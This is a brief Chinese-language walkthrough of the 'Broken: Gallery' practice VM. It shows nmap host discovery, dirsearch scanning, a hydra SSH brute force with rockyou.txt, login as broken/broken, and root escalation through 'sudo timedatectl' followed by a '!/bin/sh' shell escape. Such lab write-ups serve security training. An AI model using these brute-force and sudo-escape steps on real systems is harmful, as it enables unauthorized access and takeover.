Broken: Gallery靶机复现

靶机设置

靶机设置为NAT模式

靶机IP发现

nmap 192.168.112.0/24

靶机IP为192.168.112.142

目录扫描

dirsearch 192.168.112.142

访问浏览器

发现文件页面

查看后发现都没什么用

getshell

hydra -L rockyou.txt -P rockyou.txt 192.168.112.142 ssh

尝试爆破ssh账号密码

爆破成功

账号:broken

密码:broken

远程连接

ssh broken@192.168.112.142

连接成功

提权

sudo -l查看免密操作

尝试sudo提权

sudo timedatectl list-timezones

!/bin/sh

提权成功

相关推荐
2603_954708311 小时前
全维度容错设计,打造微电网安全运行屏障
服务器·网络·数据库·人工智能·分布式·安全
青岛前景互联信息技术有限公司2 小时前
以新标准为底座,前景互联打造高危场景智能接处警新体系
大数据·网络·人工智能
大飞记Python2 小时前
Linux命令速查手册(测试开发4年实战总结,附PDF)
linux·网络·pdf
AFinalStone2 小时前
Android 7系统网络(四)Native层(下)—netd Controller详解
android·网络
Sirius Wu3 小时前
OpenClaw(UpClaw)三层Tool全链路治理深度详解
网络·人工智能·架构·aigc
源图客3 小时前
云途物流API开发-鉴权认证(Java)
java·网络·python
huashengzsj3 小时前
Shopify个人建站如何搭建独立站:从零开始的完整指南
前端·网络·人工智能
云飞云共享云桌面4 小时前
单机建模卡顿运维繁琐!中小型机械制造厂云飞云 3D 云桌面落地
运维·服务器·网络·3d·自动化·电脑·负载均衡
mounter6255 小时前
BPF 的进化史:从网络过滤器到 AI 时代的 Linux 核心引擎
linux·网络·人工智能·ebpf·linux kernel·kernel
CryptoPP5 小时前
BSE股票K线数据接入实战:从接口调用到前端图表展示
大数据·前端·网络·人工智能·websocket·网络协议